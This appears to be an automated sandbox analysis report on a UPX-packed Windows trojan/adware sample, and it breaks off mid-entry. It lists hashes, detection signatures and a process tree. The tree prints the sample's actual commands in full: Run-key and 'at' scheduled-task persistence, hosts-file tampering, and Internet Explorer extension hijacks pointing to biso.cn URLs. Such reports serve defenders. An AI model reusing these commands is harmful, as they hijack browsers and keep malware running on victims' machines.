f192e7c73164f2ffb060debfb54e24633e6932a117925a25ac533c4be97ed7d3

Analysis

max time kernel
83s
max time network
74s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
12-10-2022 16:30

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

f192e7c73164f2ffb060debfb54e24633e6932a117925a25ac533c4be97ed7d3.exe
Size

159KB
MD5

60fcd8202d97384da4f34afadd0aa6f6
SHA1

067352f27992d7f693152216ef2b14ad49338b6e
SHA256

f192e7c73164f2ffb060debfb54e24633e6932a117925a25ac533c4be97ed7d3
SHA512

e7cd23a744636c12ba4c36fe20f1c160488ad7e9c9e27e1cc2c343d5e08a0820bf1046c0ebb0e3b0a7b16d9106bf1dbc8c19bc41b77d171041a0494b102ff983
SSDEEP

3072:aY8Y1dB+mX+zjxixGqQpTa10GilgSPK5:oWoK+HMQqQta10DlP

Score

8^/10

persistence upx

Malware Config

Signatures

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	cmd.exe

Executes dropped EXE 1 IoCs

pid	Process
1900	mstdc.exe

UPX packed file 6 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/1364-57-0x0000000000400000-0x000000000042A000-memory.dmp	upx
behavioral1/files/0x0007000000013494-60.dat	upx
behavioral1/files/0x0006000000014142-110.dat	upx
behavioral1/memory/1900-113-0x0000000000400000-0x0000000000417000-memory.dmp	upx
behavioral1/files/0x0006000000014142-108.dat	upx
behavioral1/files/0x0006000000014142-107.dat	upx

Loads dropped DLL 2 IoCs

pid	Process
1360	cmd.exe
1360	cmd.exe

Adds Run key to start application 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServicesOnce	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServicesOnce\360safe = "\"C:\\Windows\\SYSTEM32\\WinXMLdate.exe\""	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce\360safetray = "\"C:\\Windows\\Config\\shell\\winopim.exe\""	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\internat = "\"C:\\Windows\\system32\\1025\\internat.exe\""	reg.exe

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\bd.ico	cmd.exe
File created	C:\Windows\SysWOW64\gg.ico	cmd.exe
File opened for modification	C:\Windows\SysWOW64\gg.ico	cmd.exe
File created	C:\Windows\SysWOW64\bd.ico	cmd.exe

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\SYSTEM\mstdc.exe	cmd.exe
File opened for modification	C:\Windows\SYSTEM\mstdc.exe	cmd.exe

Modifies Internet Explorer settings 1 TTPs 64 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b02A04EE-3024-11D2-8F1F-0000F87ABD16}\MenuText = "╣╚╕Φ╦╤╦≈"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b02A04EE-3024-11D2-8F1F-0000F87ABD16}\MenuStatusBar = "╣╚╕Φ╦╤╦≈"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b03A04EE-3024-11D2-8F1F-0000F87ABD16}	reg.exe
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b03A04EE-3024-11D2-8F1F-0000F87ABD16}	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b03A04EE-3024-11D2-8F1F-0000F87ABD16}\Exec = "http://www.biso.cn/js/re.asp?i=9"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b01A04EE-3024-11D2-8F1F-0000F87ABD16}	reg.exe
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b02A04EE-3024-11D2-8F1F-0000F87ABD16}	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b01A04EE-3024-11D2-8F1F-0000F87ABD16}\	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b03A04EE-3024-11D2-8F1F-0000F87ABD16}\hotIcon = "C:\\Windows\\System32\\bd.ico"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b01A04EE-3024-11D2-8F1F-0000F87ABD16}	reg.exe
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b01A04EE-3024-11D2-8F1F-0000F87ABD16}	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b01A04EE-3024-11D2-8F1F-0000F87ABD16}\CLSID = "{1FBA04EE-3024-11D2-8F1F-0000F87ABD16}"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b01A04EE-3024-11D2-8F1F-0000F87ABD16}\MenuText = "╨┬╬┼╫╩╤╢"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b02A04EE-3024-11D2-8F1F-0000F87ABD16}\	reg.exe
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b02A04EE-3024-11D2-8F1F-0000F87ABD16}	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\MenuExt\╬╥╥¬╦╤╦≈	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\MenuExt\│ú╙├╚φ╝■	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b03A04EE-3024-11D2-8F1F-0000F87ABD16}\	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b02A04EE-3024-11D2-8F1F-0000F87ABD16}\MenuStatusBar = "░┘╢╚╦╤╦≈"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b01A04EE-3024-11D2-8F1F-0000F87ABD16}\hotIcon = "C:\\Windows\\System32\\shell32.dll,14"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b03A04EE-3024-11D2-8F1F-0000F87ABD16}	reg.exe
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b02A04EE-3024-11D2-8F1F-0000F87ABD16}	reg.exe
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b03A04EE-3024-11D2-8F1F-0000F87ABD16}	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b02A04EE-3024-11D2-8F1F-0000F87ABD16}\Default Visible = "yes"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b03A04EE-3024-11D2-8F1F-0000F87ABD16}\CLSID = "{1FBA04EE-3024-11D2-8F1F-0000F87ABD16}"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b02A04EE-3024-11D2-8F1F-0000F87ABD16}	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b03A04EE-3024-11D2-8F1F-0000F87ABD16}\ButtonText = "░┘╢╚╦╤╦≈"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\MenuExt\╬╥╥¬╦╤╦≈\ = "http://www.biso.cn/js/menu.asp?menu=search"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b01A04EE-3024-11D2-8F1F-0000F87ABD16}	reg.exe
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b03A04EE-3024-11D2-8F1F-0000F87ABD16}	reg.exe
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b01A04EE-3024-11D2-8F1F-0000F87ABD16}	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b01A04EE-3024-11D2-8F1F-0000F87ABD16}\MenuStatusBar = "╨┬╬┼╫╩╤╢"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b01A04EE-3024-11D2-8F1F-0000F87ABD16}	reg.exe
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b01A04EE-3024-11D2-8F1F-0000F87ABD16}	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b01A04EE-3024-11D2-8F1F-0000F87ABD16}\ClsidExtension = "╨┬╬┼╫╩╤╢"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b02A04EE-3024-11D2-8F1F-0000F87ABD16}\hotIcon = "C:\\Windows\\System32\\gg.ico"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b02A04EE-3024-11D2-8F1F-0000F87ABD16}	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\MenuExt\═°╒╛╡╝║╜	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b01A04EE-3024-11D2-8F1F-0000F87ABD16}\Default Visible = "yes"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b02A04EE-3024-11D2-8F1F-0000F87ABD16}\Icon = "C:\\Windows\\System32\\gg.ico"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b02A04EE-3024-11D2-8F1F-0000F87ABD16}	reg.exe
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b02A04EE-3024-11D2-8F1F-0000F87ABD16}	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\MenuExt\│ú╙├╚φ╝■\ = "http://www.biso.cn/js/menu.asp?menu=soft"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b02A04EE-3024-11D2-8F1F-0000F87ABD16}\ButtonText = "╣╚╕Φ╦╤╦≈"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b01A04EE-3024-11D2-8F1F-0000F87ABD16}	reg.exe
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b02A04EE-3024-11D2-8F1F-0000F87ABD16}	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b01A04EE-3024-11D2-8F1F-0000F87ABD16}\ButtonText = "╨┬╬┼╫╩╤╢"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b01A04EE-3024-11D2-8F1F-0000F87ABD16}	reg.exe
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b02A04EE-3024-11D2-8F1F-0000F87ABD16}	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b02A04EE-3024-11D2-8F1F-0000F87ABD16}\CLSID = "{1FBA04EE-3024-11D2-8F1F-0000F87ABD16}"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b02A04EE-3024-11D2-8F1F-0000F87ABD16}\ClsidExtension = "╣╚╕Φ╦╤╦≈"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\MenuExt\═°╒╛╡╝║╜\ = "http://www.biso.cn/js/menu.asp?menu=123"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b01A04EE-3024-11D2-8F1F-0000F87ABD16}\Exec = "http://www.biso.cn/js/re.asp?i=1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b01A04EE-3024-11D2-8F1F-0000F87ABD16}	reg.exe
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b02A04EE-3024-11D2-8F1F-0000F87ABD16}	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b02A04EE-3024-11D2-8F1F-0000F87ABD16}\Exec = "http://www.biso.cn/js/re.asp?i=2"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b01A04EE-3024-11D2-8F1F-0000F87ABD16}	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b01A04EE-3024-11D2-8F1F-0000F87ABD16}\Icon = "C:\\Windows\\System32\\shell32.dll,14"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\MenuExt	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b03A04EE-3024-11D2-8F1F-0000F87ABD16}\Icon = "C:\\Windows\\System32\\bd.ico"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b03A04EE-3024-11D2-8F1F-0000F87ABD16}	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b02A04EE-3024-11D2-8F1F-0000F87ABD16}\default Icon = "C:\\Windows\\System32\\gg.ico"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b02A04EE-3024-11D2-8F1F-0000F87ABD16}	reg.exe
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Extensions\{b03A04EE-3024-11D2-8F1F-0000F87ABD16}	reg.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
1272	PING.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1364 wrote to memory of 1360	1364	f192e7c73164f2ffb060debfb54e24633e6932a117925a25ac533c4be97ed7d3.exe	28
PID 1364 wrote to memory of 1360	1364	f192e7c73164f2ffb060debfb54e24633e6932a117925a25ac533c4be97ed7d3.exe	28
PID 1364 wrote to memory of 1360	1364	f192e7c73164f2ffb060debfb54e24633e6932a117925a25ac533c4be97ed7d3.exe	28
PID 1364 wrote to memory of 1360	1364	f192e7c73164f2ffb060debfb54e24633e6932a117925a25ac533c4be97ed7d3.exe	28
PID 1360 wrote to memory of 1272	1360	cmd.exe	30
PID 1360 wrote to memory of 1272	1360	cmd.exe	30
PID 1360 wrote to memory of 1272	1360	cmd.exe	30
PID 1360 wrote to memory of 1272	1360	cmd.exe	30
PID 1360 wrote to memory of 1784	1360	cmd.exe	31
PID 1360 wrote to memory of 1784	1360	cmd.exe	31
PID 1360 wrote to memory of 1784	1360	cmd.exe	31
PID 1360 wrote to memory of 1784	1360	cmd.exe	31
PID 1360 wrote to memory of 584	1360	cmd.exe	32
PID 1360 wrote to memory of 584	1360	cmd.exe	32
PID 1360 wrote to memory of 584	1360	cmd.exe	32
PID 1360 wrote to memory of 584	1360	cmd.exe	32
PID 1360 wrote to memory of 432	1360	cmd.exe	33
PID 1360 wrote to memory of 432	1360	cmd.exe	33
PID 1360 wrote to memory of 432	1360	cmd.exe	33
PID 1360 wrote to memory of 432	1360	cmd.exe	33
PID 1360 wrote to memory of 1552	1360	cmd.exe	34
PID 1360 wrote to memory of 1552	1360	cmd.exe	34
PID 1360 wrote to memory of 1552	1360	cmd.exe	34
PID 1360 wrote to memory of 1552	1360	cmd.exe	34
PID 1360 wrote to memory of 1940	1360	cmd.exe	76
PID 1360 wrote to memory of 1940	1360	cmd.exe	76
PID 1360 wrote to memory of 1940	1360	cmd.exe	76
PID 1360 wrote to memory of 1940	1360	cmd.exe	76
PID 1360 wrote to memory of 764	1360	cmd.exe	35
PID 1360 wrote to memory of 764	1360	cmd.exe	35
PID 1360 wrote to memory of 764	1360	cmd.exe	35
PID 1360 wrote to memory of 764	1360	cmd.exe	35
PID 1360 wrote to memory of 912	1360	cmd.exe	36
PID 1360 wrote to memory of 912	1360	cmd.exe	36
PID 1360 wrote to memory of 912	1360	cmd.exe	36
PID 1360 wrote to memory of 912	1360	cmd.exe	36
PID 1360 wrote to memory of 980	1360	cmd.exe	37
PID 1360 wrote to memory of 980	1360	cmd.exe	37
PID 1360 wrote to memory of 980	1360	cmd.exe	37
PID 1360 wrote to memory of 980	1360	cmd.exe	37
PID 1360 wrote to memory of 1512	1360	cmd.exe	75
PID 1360 wrote to memory of 1512	1360	cmd.exe	75
PID 1360 wrote to memory of 1512	1360	cmd.exe	75
PID 1360 wrote to memory of 1512	1360	cmd.exe	75
PID 1360 wrote to memory of 1064	1360	cmd.exe	74
PID 1360 wrote to memory of 1064	1360	cmd.exe	74
PID 1360 wrote to memory of 1064	1360	cmd.exe	74
PID 1360 wrote to memory of 1064	1360	cmd.exe	74
PID 1360 wrote to memory of 580	1360	cmd.exe	38
PID 1360 wrote to memory of 580	1360	cmd.exe	38
PID 1360 wrote to memory of 580	1360	cmd.exe	38
PID 1360 wrote to memory of 580	1360	cmd.exe	38
PID 1360 wrote to memory of 1124	1360	cmd.exe	41
PID 1360 wrote to memory of 1124	1360	cmd.exe	41
PID 1360 wrote to memory of 1124	1360	cmd.exe	41
PID 1360 wrote to memory of 1124	1360	cmd.exe	41
PID 1360 wrote to memory of 1780	1360	cmd.exe	39
PID 1360 wrote to memory of 1780	1360	cmd.exe	39
PID 1360 wrote to memory of 1780	1360	cmd.exe	39
PID 1360 wrote to memory of 1780	1360	cmd.exe	39
PID 1360 wrote to memory of 1500	1360	cmd.exe	40
PID 1360 wrote to memory of 1500	1360	cmd.exe	40
PID 1360 wrote to memory of 1500	1360	cmd.exe	40
PID 1360 wrote to memory of 1500	1360	cmd.exe	40

C:\Users\Admin\AppData\Local\Temp\f192e7c73164f2ffb060debfb54e24633e6932a117925a25ac533c4be97ed7d3.exe
"C:\Users\Admin\AppData\Local\Temp\f192e7c73164f2ffb060debfb54e24633e6932a117925a25ac533c4be97ed7d3.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1364
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\win32.bat""
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Drops file in System32 directory
  - Drops file in Windows directory
  - Suspicious use of WriteProcessMemory
  PID:1360
- - C:\Windows\SysWOW64\PING.EXE
    ping -n 1 en.517sichuan.com
    3⤵
    - Runs ping.exe
    PID:1272
- - C:\Windows\SysWOW64\at.exe
    at /delete /yes
    3⤵
    PID:1784
- - C:\Windows\SysWOW64\at.exe
    AT 11:38 /every:M,TH,Su C:\Windows\repair\winu.exe
    3⤵
    PID:584
- - C:\Windows\SysWOW64\at.exe
    AT 21:38 /every:M,T C:\Windows\repair\winu.exe
    3⤵
    PID:432
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce" /va /f
    3⤵
    PID:1552
- - C:\Windows\SysWOW64\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce /v internat /d """"C:\Windows\system32\1025\internat.exe"""" /f
    3⤵
    - Adds Run key to start application
    PID:764
- - C:\Windows\SysWOW64\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce /v 360safe /d """"C:\Windows\SYSTEM32\WinXMLdate.exe"""" /f
    3⤵
    - Adds Run key to start application
    PID:912
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\╬╥╥¬╦╤╦≈" /v "" /d "http://www.biso.cn/js/menu.asp?menu=search" /f
    3⤵
    - Modifies Internet Explorer settings
    PID:980
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b01A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "" /d "" /f
    3⤵
    - Modifies Internet Explorer settings
    PID:580
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b01A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "Default Visible" /d "yes" /f
    3⤵
    - Modifies Internet Explorer settings
    PID:1780
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b01A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "Icon" /d "C:\Windows\System32\shell32.dll,14" /f
    3⤵
    - Modifies Internet Explorer settings
    PID:1500
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b01A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "ButtonText" /d "╨┬╬┼╫╩╤╢" /f
    3⤵
    - Modifies Internet Explorer settings
    PID:1124
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b01A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "CLSID" /d "{1FBA04EE-3024-11D2-8F1F-0000F87ABD16}" /f
    3⤵
    - Modifies Internet Explorer settings
    PID:1416
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b01A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "ClsidExtension" /d "╨┬╬┼╫╩╤╢" /f
    3⤵
    - Modifies Internet Explorer settings
    PID:2040
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b01A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "Exec" /d "http://www.biso.cn/js/re.asp?i=1" /f
    3⤵
    - Modifies Internet Explorer settings
    PID:1192
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b01A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "MenuText" /d "╨┬╬┼╫╩╤╢" /f
    3⤵
    - Modifies Internet Explorer settings
    PID:1956
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b01A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "MenuStatusBar" /d "╨┬╬┼╫╩╤╢" /f
    3⤵
    - Modifies Internet Explorer settings
    PID:624
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b02A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "Default Visible" /d "yes" /f
    3⤵
    - Modifies Internet Explorer settings
    PID:1928
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b02A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "Icon" /d "C:\Windows\System32\gg.ico" /f
    3⤵
    - Modifies Internet Explorer settings
    PID:1840
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b02A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "CLSID" /d "{1FBA04EE-3024-11D2-8F1F-0000F87ABD16}" /f
    3⤵
    - Modifies Internet Explorer settings
    PID:1704
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b02A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "hotIcon" /d "C:\Windows\System32\gg.ico" /f
    3⤵
    - Modifies Internet Explorer settings
    PID:1936
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b02A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "ClsidExtension" /d "╣╚╕Φ╦╤╦≈" /f
    3⤵
    - Modifies Internet Explorer settings
    PID:1688
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b02A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "MenuText" /d "╣╚╕Φ╦╤╦≈" /f
    3⤵
    - Modifies Internet Explorer settings
    PID:1216
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b03A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "" /d "" /f
    3⤵
    - Modifies Internet Explorer settings
    PID:1608
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b03A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "ButtonText" /d "░┘╢╚╦╤╦≈" /f
    3⤵
    - Modifies Internet Explorer settings
    PID:1612
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b03A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "Default Visible" /d "yes" /f
    3⤵
    PID:1712
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b03A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "default Icon" /d "C:\Windows\System32\bd.ico" /f
    3⤵
    - Modifies Internet Explorer settings
    PID:2020
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b03A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "hotIcon" /d "C:\Windows\System32\bd.ico" /f
    3⤵
    - Modifies Internet Explorer settings
    PID:1272
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b03A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "CLSID" /d "{1FBA04EE-3024-11D2-8F1F-0000F87ABD16}" /f
    3⤵
    - Modifies Internet Explorer settings
    PID:1888
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b03A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "Icon" /d "C:\Windows\System32\bd.ico" /f
    3⤵
    - Modifies Internet Explorer settings
    PID:1532
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b03A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "Exec" /d "http://www.biso.cn/js/re.asp?i=9" /f
    3⤵
    - Modifies Internet Explorer settings
    PID:1672
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b02A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "ClsidExtension" /d "░┘╢╚╦╤╦≈" /f
    3⤵
    - Modifies Internet Explorer settings
    PID:1344
- - C:\Windows\SysWOW64\reg.exe
